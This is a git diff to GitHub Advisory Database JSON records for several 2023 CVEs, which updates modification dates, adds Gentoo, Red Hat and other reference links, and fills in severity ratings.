b/advisories/unreviewed/2023/08/GHSA-7332-j628-x48x/GHSA-7332-j628-x48x.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5467" diff --git a/advisories/unreviewed/2023/08/GHSA-7h4r-wq6r-3jj6/GHSA-7h4r-wq6r-3jj6.json b/advisories/unreviewed/2023/08/GHSA-7h4r-wq6r-3jj6/GHSA-7h4r-wq6r-3jj6.json index c2cb8d1878962..e85fca9cc126d 100644 --- a/advisories/unreviewed/2023/08/GHSA-7h4r-wq6r-3jj6/GHSA-7h4r-wq6r-3jj6.json +++ b/advisories/unreviewed/2023/08/GHSA-7h4r-wq6r-3jj6/GHSA-7h4r-wq6r-3jj6.json 
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202312-07"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5467"
diff --git a/advisories/unreviewed/2023/08/GHSA-7qmc-g5pc-f8xj/GHSA-7qmc-g5pc-f8xj.json b/advisories/unreviewed/2023/08/GHSA-7qmc-g5pc-f8xj/GHSA-7qmc-g5pc-f8xj.json
index 547b516ede914..e60215c009228 100644
--- a/advisories/unreviewed/2023/08/GHSA-7qmc-g5pc-f8xj/GHSA-7qmc-g5pc-f8xj.json
+++ b/advisories/unreviewed/2023/08/GHSA-7qmc-g5pc-f8xj/GHSA-7qmc-g5pc-f8xj.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-7qmc-g5pc-f8xj",
- "modified": "2023-08-21T18:31:23Z",
+ "modified": "2024-01-31T18:31:19Z",
 "published": "2023-08-15T18:31:33Z",
 "aliases": [
 "CVE-2023-4350"
@@ -37,6 +37,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5479"
@@ -46,7 +50,7 @@
 "cwe_ids": [

 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-15T18:15:11Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-7rfc-cwhj-x2qv/GHSA-7rfc-cwhj-x2qv.json b/advisories/unreviewed/2023/08/GHSA-7rfc-cwhj-x2qv/GHSA-7rfc-cwhj-x2qv.json
index 92a079c3c8362..d6af3decc7dec 100644
--- a/advisories/unreviewed/2023/08/GHSA-7rfc-cwhj-x2qv/GHSA-7rfc-cwhj-x2qv.json
+++ b/advisories/unreviewed/2023/08/GHSA-7rfc-cwhj-x2qv/GHSA-7rfc-cwhj-x2qv.json
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202312-07"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5467"
diff --git a/advisories/unreviewed/2023/08/GHSA-897q-36v3-jwhm/GHSA-897q-36v3-jwhm.json b/advisories/unreviewed/2023/08/GHSA-897q-36v3-jwhm/GHSA-897q-36v3-jwhm.json
index 173f43c34549e..46be075a69fbc 100644
--- a/advisories/unreviewed/2023/08/GHSA-897q-36v3-jwhm/GHSA-897q-36v3-jwhm.json
+++ b/advisories/unreviewed/2023/08/GHSA-897q-36v3-jwhm/GHSA-897q-36v3-jwhm.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-897q-36v3-jwhm",
- "modified": "2023-11-14T21:30:50Z",
+ "modified": "2024-02-08T00:32:18Z",
 "published": "2023-08-03T18:30:35Z",
 "aliases": [
 "CVE-2023-4132"
@@ -29,6 +29,14 @@
 "type": "WEB",
 "url": "https://access.redhat.com/errata/RHSA-2023:7077"
 },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2024:0575"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2024:0724"
+ },
 {
 "type": "WEB",
 "url": "https://access.redhat.com/security/cve/CVE-2023-4132"
diff --git a/advisories/unreviewed/2023/08/GHSA-8m22-fr8r-4gfj/GHSA-8m22-fr8r-4gfj.json b/advisories/unreviewed/2023/08/GHSA-8m22-fr8r-4gfj/GHSA-8m22-fr8r-4gfj.json
index 4a398d41ed3dd..310d30aa49afe 100644
--- a/advisories/unreviewed/2023/08/GHSA-8m22-fr8r-4gfj/GHSA-8m22-fr8r-4gfj.json
+++ b/advisories/unreviewed/2023/08/GHSA-8m22-fr8r-4gfj/GHSA-8m22-fr8r-4gfj.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-8m22-fr8r-4gfj",
- "modified": "2023-08-04T06:30:19Z",
+ "modified": "2024-01-31T18:31:18Z",
 "published": "2023-08-02T00:30:39Z",
 "aliases": [
 "CVE-2023-3734"
@@ -32,13 +32,17 @@
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PQKT7EGDD2P3L7S3NXEDDRCPK4NNZNWJ/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
 }
 ],
 "database_specific": {
 "cwe_ids": [

 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-01T23:15:32Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-9j4r-qr47-rcxp/GHSA-9j4r-qr47-rcxp.json b/advisories/unreviewed/2023/08/GHSA-9j4r-qr47-rcxp/GHSA-9j4r-qr47-rcxp.json
index aa3ed2340cbd2..9f8db1c8bf439 100644
--- a/advisories/unreviewed/2023/08/GHSA-9j4r-qr47-rcxp/GHSA-9j4r-qr47-rcxp.json
+++ b/advisories/unreviewed/2023/08/GHSA-9j4r-qr47-rcxp/GHSA-9j4r-qr47-rcxp.json
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202312-07"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5467"
diff --git a/advisories/unreviewed/2023/08/GHSA-9jfv-mpv4-v8gh/GHSA-9jfv-mpv4-v8gh.json b/advisories/unreviewed/2023/08/GHSA-9jfv-mpv4-v8gh/GHSA-9jfv-mpv4-v8gh.json
index ce5d9d3f44ff1..90dd261e491a6 100644
--- a/advisories/unreviewed/2023/08/GHSA-9jfv-mpv4-v8gh/GHSA-9jfv-mpv4-v8gh.json
+++ b/advisories/unreviewed/2023/08/GHSA-9jfv-mpv4-v8gh/GHSA-9jfv-mpv4-v8gh.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-9jfv-mpv4-v8gh",
- "modified": "2023-08-04T06:30:19Z",
+ "modified": "2024-01-31T18:31:18Z",
 "published": "2023-08-02T00:30:39Z",
 "aliases": [
 "CVE-2023-3736"
@@ -32,13 +32,17 @@
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PQKT7EGDD2P3L7S3NXEDDRCPK4NNZNWJ/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
 }
 ],
 "database_specific": {
 "cwe_ids": [

 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-01T23:15:33Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-9jrj-9rp7-5gh2/GHSA-9jrj-9rp7-5gh2.json b/advisories/unreviewed/2023/08/GHSA-9jrj-9rp7-5gh2/GHSA-9jrj-9rp7-5gh2.json
index d9c85bf286fb0..1e867abfb9049 100644
--- a/advisories/unreviewed/2023/08/GHSA-9jrj-9rp7-5gh2/GHSA-9jrj-9rp7-5gh2.json
+++ b/advisories/unreviewed/2023/08/GHSA-9jrj-9rp7-5gh2/GHSA-9jrj-9rp7-5gh2.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-9jrj-9rp7-5gh2",
- "modified": "2023-08-21T21:31:23Z",
+ "modified": "2024-02-03T09:30:17Z",
 "published": "2023-08-21T21:31:23Z",
 "aliases": [
 "CVE-2023-36787"
@@ -24,13 +24,17 @@
 {
 "type": "WEB",
 "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36787"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202402-05"
 }
 ],
 "database_specific": {
 "cwe_ids": [

 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-21T20:15:08Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-9xxv-mx64-rx27/GHSA-9xxv-mx64-rx27.json b/advisories/unreviewed/2023/08/GHSA-9xxv-mx64-rx27/GHSA-9xxv-mx64-rx27.json
index 507014d4d1bea..f9ff94593b66d 100644
--- a/advisories/unreviewed/2023/08/GHSA-9xxv-mx64-rx27/GHSA-9xxv-mx64-rx27.json
+++ b/advisories/unreviewed/2023/08/GHSA-9xxv-mx64-rx27/GHSA-9xxv-mx64-rx27.json
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202312-07"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5467"
diff --git a/advisories/unreviewed/2023/08/GHSA-c2gm-7c9h-9vpw/GHSA-c2gm-7c9h-9vpw.json b/advisories/unreviewed/2023/08/GHSA-c2gm-7c9h-9vpw/GHSA-c2gm-7c9h-9vpw.json
index d19f568d06fe3..3c0d77164145c 100644
--- a/advisories/unreviewed/2023/08/GHSA-c2gm-7c9h-9vpw/GHSA-c2gm-7c9h-9vpw.json
+++ b/advisories/unreviewed/2023/08/GHSA-c2gm-7c9h-9vpw/GHSA-c2gm-7c9h-9vpw.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-c2gm-7c9h-9vpw",
- "modified": "2023-08-22T18:31:31Z",
+ "modified": "2024-01-31T18:31:19Z",
 "published": "2023-08-15T18:31:33Z",
 "aliases": [
 "CVE-2023-4364"
@@ -37,6 +37,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5479"
@@ -46,7 +50,7 @@
 "cwe_ids": [

 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-15T18:15:13Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-c774-q93c-r26f/GHSA-c774-q93c-r26f.json b/advisories/unreviewed/2023/08/GHSA-c774-q93c-r26f/GHSA-c774-q93c-r26f.json
index d07924209b16e..55cf26eecc89b 100644
--- a/advisories/unreviewed/2023/08/GHSA-c774-q93c-r26f/GHSA-c774-q93c-r26f.json
+++ b/advisories/unreviewed/2023/08/GHSA-c774-q93c-r26f/GHSA-c774-q93c-r26f.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-c774-q93c-r26f",
- "modified": "2023-08-26T03:30:33Z",
+ "modified": "2024-02-03T09:30:17Z",
 "published": "2023-08-26T03:30:33Z",
 "aliases": [
 "CVE-2023-36741"
@@ -24,13 +24,17 @@
 {
 "type": "WEB",
 "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36741"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202402-05"
 }
 ],
 "database_specific": {
 "cwe_ids": [

 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-26T01:15:08Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-fxgf-5cm8-2f8q/GHSA-fxgf-5cm8-2f8q.json b/advisories/unreviewed/2023/08/GHSA-fxgf-5cm8-2f8q/GHSA-fxgf-5cm8-2f8q.json
index be5e7a7dca368..63ffe9a8627c5 100644
--- a/advisories/unreviewed/2023/08/GHSA-fxgf-5cm8-2f8q/GHSA-fxgf-5cm8-2f8q.json
+++ b/advisories/unreviewed/2023/08/GHSA-fxgf-5cm8-2f8q/GHSA-fxgf-5cm8-2f8q.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-fxgf-5cm8-2f8q",
- "modified": "2023-08-04T06:30:19Z",
+ "modified": "2024-01-31T18:31:17Z",
 "published": "2023-08-02T00:30:39Z",
 "aliases": [
 "CVE-2023-3728"
@@ -32,13 +32,17 @@
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PQKT7EGDD2P3L7S3NXEDDRCPK4NNZNWJ/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
 }
 ],
 "database_specific": {
 "cwe_ids": [
 "CWE-416"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-01T23:15:31Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-g63v-hwv9-j9q5/GHSA-g63v-hwv9-j9q5.json b/advisories/unreviewed/2023/08/GHSA-g63v-hwv9-j9q5/GHSA-g63v-hwv9-j9q5.json
index 2a1e387e79c72..51617bcacfa1a 100644
--- a/advisories/unreviewed/2023/08/GHSA-g63v-hwv9-j9q5/GHSA-g63v-hwv9-j9q5.json
+++ b/advisories/unreviewed/2023/08/GHSA-g63v-hwv9-j9q5/GHSA-g63v-hwv9-j9q5.json
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202312-07"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5467"
diff --git a/advisories/unreviewed/2023/08/GHSA-g9wf-6ppg-937x/GHSA-g9wf-6ppg-937x.json b/advisories/unreviewed/2023/08/GHSA-g9wf-6ppg-937x/GHSA-g9wf-6ppg-937x.json
index c3e2be8467858..cb2fdf496e934 100644
--- a/advisories/unreviewed/2023/08/GHSA-g9wf-6ppg-937x/GHSA-g9wf-6ppg-937x.json
+++ b/advisories/unreviewed/2023/08/GHSA-g9wf-6ppg-937x/GHSA-g9wf-6ppg-937x.json
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202312-07"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5467"
diff --git a/advisories/unreviewed/2023/08/GHSA-ggf2-7g57-86j8/GHSA-ggf2-7g57-86j8.json b/advisories/unreviewed/2023/08/GHSA-ggf2-7g57-86j8/GHSA-ggf2-7g57-86j8.json
index 1fee89a3e1315..8bcabbb75cb2e 100644
--- a/advisories/unreviewed/2023/08/GHSA-ggf2-7g57-86j8/GHSA-ggf2-7g57-86j8.json
+++ b/advisories/unreviewed/2023/08/GHSA-ggf2-7g57-86j8/GHSA-ggf2-7g57-86j8.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-ggf2-7g57-86j8",
- "modified": "2023-08-22T18:31:31Z",
+ "modified": "2024-01-31T18:31:19Z",
 "published": "2023-08-15T18:31:33Z",
 "aliases": [
 "CVE-2023-4362"
@@ -37,6 +37,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5479"
@@ -46,7 +50,7 @@
 "cwe_ids": [
 "CWE-787"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-15T18:15:13Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-h295-rcc5-87jh/GHSA-h295-rcc5-87jh.json b/advisories/unreviewed/2023/08/GHSA-h295-rcc5-87jh/GHSA-h295-rcc5-87jh.json
index e5307cdde3494..a5aef29c6b2bc 100644
--- a/advisories/unreviewed/2023/08/GHSA-h295-rcc5-87jh/GHSA-h295-rcc5-87jh.json
+++ b/advisories/unreviewed/2023/08/GHSA-h295-rcc5-87jh/GHSA-h295-rcc5-87jh.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-h295-rcc5-87jh",
- "modified": "2023-08-25T15:32:39Z",
+ "modified": "2024-01-31T18:31:19Z",
 "published": "2023-08-23T00:30:26Z",
 "aliases": [
 "CVE-2023-4430"
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KUQ7CTX3W372X3UY56VVNAHCH6H2F4X3/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5483"
@@ -50,7 +54,7 @@
 "cwe_ids": [
 "CWE-416"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-23T00:15:09Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-h9hg-9m55-82qp/GHSA-h9hg-9m55-82qp.json b/advisories/unreviewed/2023/08/GHSA-h9hg-9m55-82qp/GHSA-h9hg-9m55-82qp.json
index 0cd9660e742e4..22cd168ee67de 100644
--- a/advisories/unreviewed/2023/08/GHSA-h9hg-9m55-82qp/GHSA-h9hg-9m55-82qp.json
+++ b/advisories/unreviewed/2023/08/GHSA-h9hg-9m55-82qp/GHSA-h9hg-9m55-82qp.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-h9hg-9m55-82qp",
- "modified": "2023-08-07T21:31:00Z",
+ "modified": "2024-01-31T18:31:19Z",
 "published": "2023-08-03T03:30:21Z",
 "aliases": [
 "CVE-2023-37679"
@@ -32,13 +32,17 @@
 {
 "type": "WEB",
 "url": "http://nextgen.com"
+ },
+ {
+ "type": "WEB",
+ "url": "http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html"
 }
 ],
 "database_specific": {
 "cwe_ids": [
 "CWE-77"
 ],
- "severity": null,
+ "severity": "CRITICAL",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-03T03:15:10Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-jjw4-gf4w-43f9/GHSA-jjw4-gf4w-43f9.json b/advisories/unreviewed/2023/08/GHSA-jjw4-gf4w-43f9/GHSA-jjw4-gf4w-43f9.json
index a60531b62f790..3a141dbe0fcfe 100644
--- a/advisories/unreviewed/2023/08/GHSA-jjw4-gf4w-43f9/GHSA-jjw4-gf4w-43f9.json
+++ b/advisories/unreviewed/2023/08/GHSA-jjw4-gf4w-43f9/GHSA-jjw4-gf4w-43f9.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-jjw4-gf4w-43f9",
- "modified": "2023-08-05T06:30:59Z",
+ "modified": "2024-01-31T18:31:18Z",
 "published": "2023-08-02T00:30:39Z",
 "aliases": [
 "CVE-2023-3740"
@@ -32,13 +32,17 @@
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PQKT7EGDD2P3L7S3NXEDDRCPK4NNZNWJ/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
 }
 ],
 "database_specific": {
 "cwe_ids": [

 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-01T23:15:33Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-m37v-mhqj-22cm/GHSA-m37v-mhqj-22cm.json b/advisories/unreviewed/2023/08/GHSA-m37v-mhqj-22cm/GHSA-m37v-mhqj-22cm.json
index c570040fd6b6f..77845b69bd1ab 100644
--- a/advisories/unreviewed/2023/08/GHSA-m37v-mhqj-22cm/GHSA-m37v-mhqj-22cm.json
+++ b/advisories/unreviewed/2023/08/GHSA-m37v-mhqj-22cm/GHSA-m37v-mhqj-22cm.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-m37v-mhqj-22cm",
- "modified": "2023-08-04T06:30:19Z",
+ "modified": "2024-01-31T18:31:18Z",
 "published": "2023-08-02T00:30:39Z",
 "aliases": [
 "CVE-2023-3735"
@@ -32,13 +32,17 @@
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PQKT7EGDD2P3L7S3NXEDDRCPK4NNZNWJ/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
 }
 ],
 "database_specific": {
 "cwe_ids": [

 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-01T23:15:32Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-m4qj-9cr4-hrw4/GHSA-m4qj-9cr4-hrw4.json b/advisories/unreviewed/2023/08/GHSA-m4qj-9cr4-hrw4/GHSA-m4qj-9cr4-hrw4.json
index 823aefacb4eea..39b74b1195e38 100644
--- a/advisories/unreviewed/2023/08/GHSA-m4qj-9cr4-hrw4/GHSA-m4qj-9cr4-hrw4.json
+++ b/advisories/unreviewed/2023/08/GHSA-m4qj-9cr4-hrw4/GHSA-m4qj-9cr4-hrw4.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-m4qj-9cr4-hrw4",
- "modified": "2023-08-25T00:31:58Z",
+ "modified": "2024-01-31T00:30:16Z",
 "published": "2023-08-25T00:31:58Z",
 "aliases": [
 "CVE-2023-4508"
@@ -25,6 +25,10 @@
 "type": "WEB",
 "url": "https://github.com/gerbv/gerbv/issues/191"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/gerbv/gerbv/commit/5517e22250e935dc7f86f64ad414aeae3dbcb36a"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/gerbv/gerbv/commit/dfb5aac533a3f9e8ccd93ca217a753258cba4fe5"
@@ -42,7 +46,7 @@
 "cwe_ids": [
 "CWE-824"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-24T23:15:09Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-m56x-9vph-h345/GHSA-m56x-9vph-h345.json b/advisories/unreviewed/2023/08/GHSA-m56x-9vph-h345/GHSA-m56x-9vph-h345.json
index 0704daa5cc736..fca1b70f1d021 100644
--- a/advisories/unreviewed/2023/08/GHSA-m56x-9vph-h345/GHSA-m56x-9vph-h345.json
+++ b/advisories/unreviewed/2023/08/GHSA-m56x-9vph-h345/GHSA-m56x-9vph-h345.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-m56x-9vph-h345",
- "modified": "2023-08-25T15:32:39Z",
+ "modified": "2024-01-31T18:31:19Z",
 "published": "2023-08-23T00:30:26Z",
 "aliases": [
 "CVE-2023-4428"
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KUQ7CTX3W372X3UY56VVNAHCH6H2F4X3/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5483"
@@ -50,7 +54,7 @@
 "cwe_ids": [
 "CWE-125"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-23T00:15:09Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-m6r7-j99r-j8cp/GHSA-m6r7-j99r-j8cp.json b/advisories/unreviewed/2023/08/GHSA-m6r7-j99r-j8cp/GHSA-m6r7-j99r-j8cp.json
index b0082263dec2b..48b8c8a23e692 100644
--- a/advisories/unreviewed/2023/08/GHSA-m6r7-j99r-j8cp/GHSA-m6r7-j99r-j8cp.json
+++ b/advisories/unreviewed/2023/08/GHSA-m6r7-j99r-j8cp/GHSA-m6r7-j99r-j8cp.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-m6r7-j99r-j8cp",
- "modified": "2023-08-04T06:30:19Z",
+ "modified": "2024-01-31T18:31:17Z",
 "published": "2023-08-02T00:30:39Z",
 "aliases": [
 "CVE-2023-3727"
@@ -32,13 +32,17 @@
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PQKT7EGDD2P3L7S3NXEDDRCPK4NNZNWJ/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
 }
 ],
 "database_specific": {
 "cwe_ids": [
 "CWE-416"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-01T23:15:31Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-mfg8-cf72-xff4/GHSA-mfg8-cf72-xff4.json b/advisories/unreviewed/2023/08/GHSA-mfg8-cf72-xff4/GHSA-mfg8-cf72-xff4.json
index 92334f071ecb4..d6794c3d3d6e7 100644
--- a/advisories/unreviewed/2023/08/GHSA-mfg8-cf72-xff4/GHSA-mfg8-cf72-xff4.json
+++ b/advisories/unreviewed/2023/08/GHSA-mfg8-cf72-xff4/GHSA-mfg8-cf72-xff4.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-mfg8-cf72-xff4",
- "modified": "2023-08-21T15:30:16Z",
+ "modified": "2024-01-31T18:31:19Z",
 "published": "2023-08-15T18:31:33Z",
 "aliases": [
 "CVE-2023-4349"
@@ -37,6 +37,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5479"
@@ -46,7 +50,7 @@
 "cwe_ids": [
 "CWE-416"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-15T18:15:10Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-mh2g-52mr-mr5v/GHSA-mh2g-52mr-mr5v.json b/advisories/unreviewed/2023/08/GHSA-mh2g-52mr-mr5v/GHSA-mh2g-52mr-mr5v.json
index d1004c41bb90d..7e1ee98e49a22 100644
--- a/advisories/unreviewed/2023/08/GHSA-mh2g-52mr-mr5v/GHSA-mh2g-52mr-mr5v.json
+++ b/advisories/unreviewed/2023/08/GHSA-mh2g-52mr-mr5v/GHSA-mh2g-52mr-mr5v.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-mh2g-52mr-mr5v",
- "modified": "2023-08-21T18:31:23Z",
+ "modified": "2024-01-31T18:31:19Z",
 "published": "2023-08-15T18:31:33Z",
 "aliases": [
 "CVE-2023-4351"
@@ -37,6 +37,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5479"
@@ -46,7 +50,7 @@
 "cwe_ids": [
 "CWE-416"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-08-15T18:15:11Z"
diff --git a/advisories/unreviewed/2023/08/GHSA-mjq9-8vf6-qh49/GHSA-mjq9-8vf6-qh49.json b/advisories/unreviewed/2023/08/GHSA-mjq9-8vf6-qh49/GHSA-mjq9-8vf6-qh49.json
index 51f5487541ee4..f274143a7cb61 100644
--- a/advisories/unreviewed/2023/08/GHSA-mjq9-8vf6-qh49/GHSA-mjq9-8vf6-qh49.json
+++ b/advisories/unreviewed/2023/08/GHSA-mjq9-8vf6-qh49/GHSA-mjq9-8vf6-qh49.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
